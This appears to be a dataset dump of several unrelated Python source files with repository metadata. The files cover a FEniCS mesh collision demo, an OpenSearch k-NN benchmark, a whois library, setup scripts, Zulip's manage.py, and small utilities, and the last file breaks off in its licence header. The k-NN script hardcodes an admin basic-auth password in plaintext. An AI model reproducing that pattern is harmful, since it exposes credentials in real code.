hexsha
stringlengths 40
40
| size
int64 5
1.03M
| ext
stringclasses 9
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
241
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
208k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
241
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
241
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
1.03M
| avg_line_length
float64 1.5
756k
| max_line_length
int64 4
869k
| alphanum_fraction
float64 0.01
0.98
| count_classes
int64 0
3.38k
| score_classes
float64 0
0.01
| count_generators
int64 0
832
| score_generators
float64 0
0
| count_decorators
int64 0
2.75k
| score_decorators
float64 0
0
| count_async_functions
int64 0
623
| score_async_functions
float64 0
0
| count_documentation
int64 3
581k
| score_documentation
float64 0.4
0.6
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
16e8783047883ecc17068c1f63c87b161a271a5f | 1,054 | py | Python | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | [
"MIT"
] | 4 | 2020-07-30T02:38:29.000Z | 2021-09-12T14:30:18.000Z | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | [
"MIT"
] | null | null | null | vtkplotter_examples/other/dolfin/collisions.py | ismarou/vtkplotter-examples | 1eefcc026be169ab7a77a5bce6dec8044c33b554 | [
"MIT"
] | null | null | null | '''
compute_collision() will compute the collision of all the entities with
a Point while compute_first_collision() will always return its first entry.
Especially if a point is on an element edge this can be tricky.
You may also want to compare with the Cell.contains(Point) tool.
'''
# Script by Rudy at https://fenicsproject.discourse.group/t/
# any-function-to-determine-if-the-point-is-in-the-mesh/275/3
import dolfin
from vtkplotter.dolfin import shapes, plot, printc
n = 4
Px = 0.5
Py = 0.5
mesh = dolfin.UnitSquareMesh(n, n)
bbt = mesh.bounding_box_tree()
collisions = bbt.compute_collisions(dolfin.Point(Px, Py))
collisions1st = bbt.compute_first_entity_collision(dolfin.Point(Px, Py))
printc("collisions : ", collisions)
printc("collisions 1st: ", collisions1st)
for cell in dolfin.cells(mesh):
contains = cell.contains(dolfin.Point(Px, Py))
printc("Cell", cell.index(), "contains P:", contains, c=contains)
###########################################
pt = shapes.Point([Px, Py], c='blue')
plot(mesh, pt, text=__doc__)
| 35.133333 | 75 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 519 | 0.49241 |
16e89821c774aa40fe5b74ea387488fc99280078 | 7,309 | py | Python | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | [
"Apache-2.0"
] | 1 | 2021-11-16T13:22:09.000Z | 2021-11-16T13:22:09.000Z | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | [
"Apache-2.0"
] | null | null | null | aws-KNN-RESTful.py | cakebytheoceanLuo/k-NN | 52c66b5e38490431b3079c2baaad38785802f4e5 | [
"Apache-2.0"
] | null | null | null | # https://medium.com/@kumon/how-to-realize-similarity-search-with-elasticsearch-3dd5641b9adb
# https://docs.aws.amazon.com/opensearch-service/latest/developerguide/knn.html
import sys
import requests
import h5py
import numpy as np
import json
import aiohttp
import asyncio
import time
import httpx
from requests.auth import HTTPBasicAuth
from statistics import mean
# if len(sys.argv) != 2:
# print("Type in the efSearch!")
# sys.exit()
# path = '/tmp/sift-128-euclidean.hdf5.1M' # float dataset
# path = '/tmp/sift-128-euclidean.hdf5' # float dataset
path = '/home/ubuntu/sift-128-euclidean.hdf5' # float dataset
output_csv = '/tmp/sift-es.csv'
# url = 'http://127.0.0.1:9200/sift-index/'
host = 'https://vpc-....ap-southeast-1.es.amazonaws.com/' # single node
# host = 'https://vpc-....ap-southeast-1.es.amazonaws.com/' # two nodes
url = host + 'sift-index/'
requestHeaders = {'content-type': 'application/json'} # https://stackoverflow.com/questions/51378099/content-type-header-not-supported
auth = HTTPBasicAuth('admin', 'I#vu7bTAHB')
# Build an index
#https://stackoverflow.com/questions/17301938/making-a-request-to-a-restful-api-using-python
# PUT sift-index
data = '''{
"settings": {
"index": {
"knn": true,
"knn.space_type": "l2",
"knn.algo_param.m": 6,
"knn.algo_param.ef_construction": 50,
"knn.algo_param.ef_search": 50,
"refresh_interval": -1,
"translog.flush_threshold_size": "10gb",
"number_of_replicas": 0
}
},
"mappings": {
"properties": {
"sift_vector": {
"type": "knn_vector",
"dimension": 128
}
}
}
}'''
# https://medium.com/@kumon/how-to-realize-similarity-search-with-elasticsearch-3dd5641b9adb
response = requests.put(url, data=data, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'))
# response = requests.put(url, data=data, verify=False, headers=requestHeaders, auth=auth)
assert response.status_code==requests.codes.ok
# cluster_url = 'http://127.0.0.1:9200/_cluster/settings'
cluster_url = host + '_cluster/settings'
cluster_data = '''{
"persistent" : {
"knn.algo_param.index_thread_qty": 16
}
}
'''
response = requests.put(cluster_url, data=cluster_data, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'), headers=requestHeaders)
assert response.status_code==requests.codes.ok
# Bulkload into index
bulk_template = '{ "index": { "_index": "sift-index", "_id": "%s" } }\n{ "sift_vector": [%s] }\n'
hf = h5py.File(path, 'r')
for key in hf.keys():
print("A key of hf is %s" % key) #Names of the groups in HDF5 file.
vectors = np.array(hf["train"][:])
num_vectors, dim = vectors.shape
print("num_vectors: %d" % num_vectors)
print("dim: %d" % dim)
bulk_data = ""
start = time.time()
for (id,vector) in enumerate(vectors):
assert len(vector)==dim
vector_str = ""
for num in vector:
vector_str += str(num) + ','
vector_str = vector_str[:-1]
id_str = str(id)
single_bulk_done = bulk_template % (id_str, vector_str)
bulk_data += single_bulk_done
if (id+1) % 100000 == 0:
print(str(id+1))
# POST _bulk
response = requests.put(url + '_bulk', data=bulk_data, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'), headers=requestHeaders)
assert response.status_code==requests.codes.ok
bulk_data = ""
end = time.time()
print("Insert Time: %d mins" % ((end - start) / 60.0)) # Unit: min
# refresh_url = 'http://127.0.0.1:9200/sift-index/_settings'
refresh_url = host + 'sift-index/_settings'
refresh_data = '''{
"index" : {
"refresh_interval": "1s"
}
}
'''
response = requests.put(refresh_url, data=refresh_data, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'))
assert response.status_code==requests.codes.ok
# response = requests.post('http://127.0.0.1:9200/sift-index/_refresh', verify=False, headers=requestHeaders)
# assert response.status_code==requests.codes.ok
# merge_url = 'http://127.0.0.1:9200/sift-index/_forcemerge?max_num_segments=1'
merge_url = host + 'sift-index/_forcemerge?max_num_segments=1'
merge_response = requests.post(merge_url, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'), timeout=600)
assert merge_response.status_code==requests.codes.ok
# warmup_url = 'http://127.0.0.1:9200/_opendistro/_knn/warmup/sift-index'
warmup_url = host + '_opendistro/_knn/warmup/sift-index'
warmup_response = requests.get(warmup_url, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'))
assert warmup_response.status_code==requests.codes.ok
# Send queries
total_time = 0 # in ms
hits = 0 # for recall calculation
query_template = '''
{
"size": 50,
"query": {"knn": {"sift_vector": {"vector": [%s],"k": 50}}}
}
'''
queries = np.array(hf["test"][:])
nq = len(queries)
neighbors = np.array(hf["neighbors"][:])
# distances = np.array(hf["distances"][:])
num_queries, q_dim = queries.shape
print("num_queries: %d" % num_queries)
print("q_dim: %d" % q_dim)
assert q_dim==dim
ef_search_list = [50, 100, 150, 200, 250, 300]
for ef_search in ef_search_list:
ef_data = '''{
"index": {
"knn.algo_param.ef_search": %d
}
}'''
ef_data = ef_data % ef_search
### Update Index Setting: efSearch
response = requests.put(url + '_settings', data=ef_data, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'))
assert response.status_code==requests.codes.ok
total_time_list = []
hits_list = []
for count in range(5):
total_time = 0 # in ms
hits = 0 # for recall calculation
query_template = '''
'''
single_query = '''{}\n{"size": 50, "query": {"knn": {"sift_vector": {"vector": [%s],"k": 50}}}}\n'''
for (id,query) in enumerate(queries):
assert len(query)==dim
query_str = ""
for num in query:
query_str += str(num) + ','
query_str = query_str[:-1]
# GET sift-index/_search
single_query_done = single_query % (query_str)
query_template += single_query_done
query_data = query_template
# print(query_data)
response = requests.get(url + '_msearch', data=query_data, headers=requestHeaders, auth=HTTPBasicAuth('admin', 'I#vu7bTAHB'), stream=True)
assert response.status_code==requests.codes.ok
# print(response.text)
result = json.loads(response.text)
# QPS
total_time = result['took']
# tooks = []
# for i in range(len(queries)):
# for ele in result['responses']:
# tooks.append(int(ele['took']))
for id in range(len(queries)):
# Recall
neighbor_id_from_result = []
for ele in result['responses'][id]['hits']['hits']:
neighbor_id_from_result.append(int(ele['_id']))
assert len(neighbor_id_from_result)==50
# print("neighbor_id_from_result: ")
# print(neighbor_id_from_result)
neighbor_id_gt = neighbors[id][0:50] # topK=50
# print("neighbor_id_gt")
# print(neighbor_id_gt)
hits_q = len(list(set(neighbor_id_from_result) & set(neighbor_id_gt)))
# print("# hits of this query with topk=50: %d" % hits_q)
hits += hits_q
total_time_list.append(total_time)
hits_list.append(hits)
print(total_time_list)
total_time_avg = mean(total_time_list[2:-1])
hits_avg = mean(hits_list)
QPS = 1.0 * nq / (total_time_avg / 1000.0)
recall = 1.0 * hits_avg / (nq * 50)
print(ef_search, QPS, recall)
| 33.374429 | 142 | 0.675332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,478 | 0.475852 |
16ea2d8be166b5650aea4af33dbde9040a41f768 | 1,438 | py | Python | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | [
"BSD-2-Clause"
] | null | null | null | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | [
"BSD-2-Clause"
] | null | null | null | test/test_docker_images.py | bauerj/cibuildwheel | b4addbf4a94daa76769d4f779e169406b0ef99ae | [
"BSD-2-Clause"
] | null | null | null | import platform
import textwrap
import pytest
from . import test_projects, utils
dockcross_only_project = test_projects.new_c_project(
setup_py_add=textwrap.dedent(r'''
import os, sys
# check that we're running in the correct docker image as specified in the
# environment options CIBW_MANYLINUX1_*_IMAGE
if "linux" in sys.platform and not os.path.exists("/dockcross"):
raise Exception(
"/dockcross directory not found. Is this test running in the correct docker image?"
)
''')
)
def test(tmp_path):
if utils.platform != 'linux':
pytest.skip('the test is only relevant to the linux build')
if platform.machine() not in ['x86_64', 'i686']:
pytest.skip('this test is currently only possible on x86_64/i686 due to availability of alternative images')
project_dir = tmp_path / 'project'
dockcross_only_project.generate(project_dir)
actual_wheels = utils.cibuildwheel_run(project_dir, add_env={
'CIBW_MANYLINUX_X86_64_IMAGE': 'dockcross/manylinux2010-x64',
'CIBW_MANYLINUX_I686_IMAGE': 'dockcross/manylinux2010-x86',
'CIBW_SKIP': 'pp* cp39-*',
})
# also check that we got the right wheels built
expected_wheels = [w for w in utils.expected_wheels('spam', '0.1.0')
if '-pp' not in w and '-cp39-' not in w]
assert set(actual_wheels) == set(expected_wheels)
| 35.073171 | 116 | 0.672462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 770 | 0.535466 |
bc447d214c0f2c389991fd5918f6f13fed4aaf6b | 634 | py | Python | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | [
"MIT"
] | null | null | null | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | [
"MIT"
] | null | null | null | line_counter/TestCodes/python_test.py | FMoller/coding-auxiliary-tools | 21784f01731404f33059f3a8c4e73a104709ffe9 | [
"MIT"
] | null | null | null | """A simple file to test the line_counter performance in python
This is a multiline doctest
"""
__author__ = "Frederico Moeller"
__copyright__ = ""
__credits__ = ["Frederico Moeller"]
__license__ = "MIT"
__version__ = "1.0.1"
__maintainer__ = "Frederico Moeller"
__email__ = ""
__status__ = ""
#import things
import math
#define things
def some_function(var_one, var_two,
var_three):
"""This is a function that do things"""
if var_one > var_two:
if var_two*var_three > var_one:
return "blab" #this happens
else:
return "blob"
else:
return "fish"
| 21.133333 | 63 | 0.641956 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 268 | 0.422713 |
bc44f25c8ff96beccbbd3fbaa05ae2dcf6790cc6 | 576 | py | Python | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | [
"MIT"
] | null | null | null | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | [
"MIT"
] | null | null | null | fopp/Chapter 12. Functions/get_num_digits.py | H2u-Hwng/EVC | c650fe7356a333011514cf9025dfd97bf71b1de3 | [
"MIT"
] | null | null | null | # Take number, and convert integer to string
# Calculate and return number of digits
def get_num_digits(num):
# Convert int to str
num_str = str(num)
# Calculate number of digits
digits = len(num_str)
return digits
# Define main function
def main():
# Prompt user for an integer
number = int(input('Enter an integer: '))
# Obtain number of digits
num_digits = get_num_digits(number)
# Display result
print(f'The number of digits in number {number} is {num_digits}.')
# Call main function
main()
| 20.571429 | 70 | 0.647569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.557292 |
bc450f5f688b95fda7b269a4ca568c7ecc5143ca | 4,992 | py | Python | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | [
"MIT"
] | null | null | null | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | [
"MIT"
] | null | null | null | whois/__init__.py | mzpqnxow/whois-1 | b5623ed25cfa58d9457d30dae640e69b9e530b23 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import *
import re
import sys
import os
import subprocess
import socket
from .parser import WhoisEntry
from .whois import NICClient
# thanks to https://www.regextester.com/104038
IPV4_OR_V6 = re.compile(r"((^\s*((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))\s*$)|(^\s*((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))(%.+)?\s*$))")
def whois(url, command=False, flags=0):
# clean domain to expose netloc
ip_match = IPV4_OR_V6.match(url)
if ip_match:
domain = url
try:
result = socket.gethostbyaddr(url)
except socket.herror as e:
pass
else:
domain = extract_domain(result[0])
else:
domain = extract_domain(url)
if command:
# try native whois command
r = subprocess.Popen(['whois', domain], stdout=subprocess.PIPE)
text = r.stdout.read().decode()
else:
# try builtin client
nic_client = NICClient()
text = nic_client.whois_lookup(None, domain.encode('idna'), flags)
return WhoisEntry.load(domain, text)
suffixes = None
def extract_domain(url):
"""Extract the domain from the given URL
>>> print(extract_domain('http://www.google.com.au/tos.html'))
google.com.au
>>> print(extract_domain('abc.def.com'))
def.com
>>> print(extract_domain(u'www.公司.hk'))
公司.hk
>>> print(extract_domain('chambagri.fr'))
chambagri.fr
>>> print(extract_domain('www.webscraping.com'))
webscraping.com
>>> print(extract_domain('198.252.206.140'))
stackoverflow.com
>>> print(extract_domain('102.112.2O7.net'))
2o7.net
>>> print(extract_domain('globoesporte.globo.com'))
globo.com
>>> print(extract_domain('1-0-1-1-1-0-1-1-1-1-1-1-1-.0-0-0-0-0-0-0-0-0-0-0-0-0-10-0-0-0-0-0-0-0-0-0-0-0-0-0.info'))
0-0-0-0-0-0-0-0-0-0-0-0-0-10-0-0-0-0-0-0-0-0-0-0-0-0-0.info
>>> print(extract_domain('2607:f8b0:4006:802::200e'))
1e100.net
>>> print(extract_domain('172.217.3.110'))
1e100.net
"""
if IPV4_OR_V6.match(url):
# this is an IP address
return socket.gethostbyaddr(url)[0]
# load known TLD suffixes
global suffixes
if not suffixes:
# downloaded from https://publicsuffix.org/list/public_suffix_list.dat
tlds_path = os.path.join(os.getcwd(), os.path.dirname(__file__), 'data', 'public_suffix_list.dat')
with open(tlds_path, encoding='utf-8') as tlds_fp:
suffixes = set(line.encode('utf-8') for line in tlds_fp.read().splitlines() if line and not line.startswith('//'))
if not isinstance(url, str):
url = url.decode('utf-8')
url = re.sub('^.*://', '', url)
url = url.split('/')[0].lower()
# find the longest suffix match
domain = b''
split_url = url.split('.')
for section in reversed(split_url):
if domain:
domain = b'.' + domain
domain = section.encode('utf-8') + domain
if domain not in suffixes:
if not b'.' in domain and len(split_url) >= 2:
# If this is the first section and there wasn't a match, try to
# match the first two sections - if that works, keep going
# See https://github.com/richardpenman/whois/issues/50
second_order_tld = '.'.join([split_url[-2], split_url[-1]])
if not second_order_tld.encode('utf-8') in suffixes:
break
else:
break
return domain.decode('utf-8')
if __name__ == '__main__':
try:
url = sys.argv[1]
except IndexError:
print('Usage: %s url' % sys.argv[0])
else:
print(whois(url))
| 42.305085 | 1,227 | 0.55629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,724 | 0.5448 |
bc4f5018d00b3586d20735c150c38e4b306f48f3 | 325 | py | Python | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | [
"MIT"
] | 7 | 2020-03-23T21:43:32.000Z | 2021-03-30T09:11:45.000Z | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | [
"MIT"
] | 4 | 2020-05-09T01:13:24.000Z | 2022-01-13T02:24:14.000Z | models/minimize_model.py | MichalBusta/OpenCitiesAIC | 2358118a782edde27a588d6adaf79941cbd90de6 | [
"MIT"
] | 4 | 2020-04-17T15:06:36.000Z | 2021-03-30T09:11:47.000Z | '''
Created on Mar 22, 2020
@author: Michal.Busta at gmail.com
'''
#get rid of the optimizer state ...
import torch
MODEL_PATH = '/models/model-b2-2.pth'
state = torch.load(MODEL_PATH, map_location=lambda storage, loc: storage)
state_out = {
"state_dict": state["state_dict"],
}
torch.save(state_out, 'model-b2-2.pth') | 20.3125 | 73 | 0.707692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.513846 |
bc4fb0ed6bbdc4f3f5e43225548f14915b084779 | 1,125 | py | Python | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | [
"MIT"
] | 6 | 2018-02-09T15:03:12.000Z | 2021-02-18T07:21:34.000Z | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | [
"MIT"
] | 17 | 2018-03-20T09:28:32.000Z | 2022-01-27T08:48:41.000Z | setup.py | thomas-kloeber/braumeister | 1045df0ad95eb6a4b9b16bb91ece64b09ff1b1f7 | [
"MIT"
] | 7 | 2018-02-09T15:06:11.000Z | 2020-03-02T10:23:10.000Z | import os
import re
from setuptools import setup
version = re.search(
'^__version__\s*=\s*"(.*)"',
open('braumeister/braumeister.py').read(),
re.M
).group(1)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="braumeister",
packages=["braumeister", "braumeister.actions"],
version=version,
author="Marcel Steffen",
author_email="marcel@talentsconnect.com",
description="Easy release bulding, combining JIRA and git",
long_description=read('README.md'),
license="MIT",
keywords="git jira release",
url="https://www.talentsconnect.com",
include_package_data=True,
install_requires=['requests', 'colorama'],
entry_points={
'console_scripts': ["braumeister = braumeister.braumeister:main"]
},
python_requires='!=2.7, !=3.4, >=3.5',
zip_safe=False,
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Topic :: Utilities",
"Topic :: Software Development :: Version Control :: Git"
],
)
| 26.162791 | 73 | 0.639111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 525 | 0.466667 |
bc5478846dead2384e17349d8f75968c543992de | 407 | py | Python | pkg/maths/maths.py | prateekdegaons1991/experiment-loadtest | b53c70fac5b2f7d37df77844b26f79741c74c1b6 | [
"Apache-2.0"
] | 8 | 2020-04-17T06:34:30.000Z | 2021-12-18T10:54:50.000Z | pkg/maths/maths.py | oumkale/test-python | 1f3d3e42ffbe1bf5ed9df8a0c6038e50129b2c4d | [
"Apache-2.0"
] | 15 | 2020-04-18T06:01:53.000Z | 2022-02-15T08:56:25.000Z | pkg/maths/maths.py | oumkale/test-python | 1f3d3e42ffbe1bf5ed9df8a0c6038e50129b2c4d | [
"Apache-2.0"
] | 12 | 2020-04-17T05:14:27.000Z | 2022-03-29T19:24:20.000Z | #Atoi stands for ASCII to Integer Conversion
def atoi(string):
res = 0
# Iterate through all characters of
# input and update result
for i in range(len(string)):
res = res * 10 + (ord(string[i]) - ord('0'))
return res
#Adjustment contains rule of three for calculating an integer given another integer representing a percentage
def Adjustment(a, b):
return (a * b) / 100
| 27.133333 | 109 | 0.673219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.53317 |
bc6de8ef28a6c9ca4fc7727dee2d21bb765f85a1 | 1,585 | py | Python | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | [
"MIT"
] | null | null | null | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | [
"MIT"
] | null | null | null | scripts/json_parse.py | andrewsimonds14/Capstone | 5ae56b9be40846e9993a8f23aaa8e1ef92cd9ea3 | [
"MIT"
] | null | null | null | import json
import os
import nibabel as nib
import csv
from operator import itemgetter
# PATH TO PREPROCESSED DATA
raw_data_path = '/home/lab/nnUNet_data/nnUNet_raw_data_base/nnUNet_raw_data/Task500_BrainMets'
pixdim_ind = [1,2,3] # Indexes at which the voxel size [x,y,z] is stored
# PATH TO JSON FILE
with open('/home/lab/nnUNet_data/RESULTS_FOLDER/nnUNet/3d_fullres/Task500_BrainMets/nnUNetTrainerV2__nnUNetPlansv2.1/fold_4/validation_raw/summary.json') as file:
data = json.load(file)
with open('json_parsed.csv', mode='w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Case Number', 'Dice Score', 'Voxel Size-X', 'Voxel Size-Y', 'Voxel Size-Z'])
for img in data['results']['all']:
# Get dice score on image
dice = img['1']['Dice']
# Get nifti data on image
img_filename = (os.path.basename(img['reference']).split('.'))[0]
img_ni = nib.load(raw_data_path + '/imagesTr/' + img_filename + '_0000.nii.gz')
label_ni = nib.load(raw_data_path + '/labelsTr/' + img_filename + '.nii.gz')
voxel_size = itemgetter(*pixdim_ind)(img_ni.header["pixdim"])
# Get tumor dimensions
# tumor_size =
# Get case number corresponding to image
case_number = img_filename.split('_')[1]
# Write to csv file
csv_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow([case_number, dice, voxel_size[0], voxel_size[1], voxel_size[2]])
| 36.860465 | 162 | 0.683281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 657 | 0.414511 |
bc7b31007719919e0de3183e896e2da210eb63a7 | 1,706 | py | Python | manage.py | isijara/zulip | 403f4dafcc71369f3b1143b9f7073cd5d76bf357 | [
"Apache-2.0"
] | 1 | 2019-04-14T20:31:55.000Z | 2019-04-14T20:31:55.000Z | manage.py | hcxiong/zulip | bf22eefedebd50b25f32b22988217c13a89b65d1 | [
"Apache-2.0"
] | 7 | 2020-09-06T14:54:30.000Z | 2022-02-10T18:51:14.000Z | manage.py | hcxiong/zulip | bf22eefedebd50b25f32b22988217c13a89b65d1 | [
"Apache-2.0"
] | 9 | 2019-11-04T18:59:29.000Z | 2022-03-22T17:46:37.000Z | #!/usr/bin/env python3
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
import scripts.lib.setup_path_on_import
if __name__ == "__main__":
if 'posix' in os.name and os.geteuid() == 0:
print("manage.py should not be run as root. Use `su zulip` to drop root.")
sys.exit(1)
if (os.access('/etc/zulip/zulip.conf', os.R_OK) and not
os.access('/etc/zulip/zulip-secrets.conf', os.R_OK)):
# The best way to detect running manage.py as another user in
# production before importing anything that would require that
# access is to check for access to /etc/zulip/zulip.conf (in
# which case it's a production server, not a dev environment)
# and lack of access for /etc/zulip/zulip-secrets.conf (which
# should be only readable by root and zulip)
print("Error accessing Zulip secrets; manage.py in production must be run as the zulip user.")
sys.exit(1)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "zproject.settings")
from django.conf import settings
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from scripts.lib.zulip_tools import log_management_command
log_management_command(" ".join(sys.argv), settings.MANAGEMENT_LOG_PATH)
os.environ.setdefault("PYTHONSTARTUP", os.path.join(BASE_DIR, "scripts/lib/pythonrc.py"))
if "--no-traceback" not in sys.argv and len(sys.argv) > 1:
sys.argv.append("--traceback")
try:
execute_from_command_line(sys.argv)
except CommandError as e:
print(e, file=sys.stderr)
sys.exit(1)
| 42.65 | 102 | 0.694607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 712 | 0.417351 |
bc8efe8d75934b61443e05664bf142fdc9790c04 | 6,351 | py | Python | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | [
"CC0-1.0",
"MIT"
] | 94 | 2016-03-04T17:25:53.000Z | 2022-03-18T18:05:23.000Z | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | [
"CC0-1.0",
"MIT"
] | 2,841 | 2016-01-21T09:06:49.000Z | 2022-03-18T14:53:56.000Z | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | [
"CC0-1.0",
"MIT"
] | 71 | 2015-09-30T08:35:35.000Z | 2022-03-16T07:16:28.000Z | #!/usr/bin/env python3
# coding: utf8
# /*##########################################################################
#
# Copyright (c) 2015-2021 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
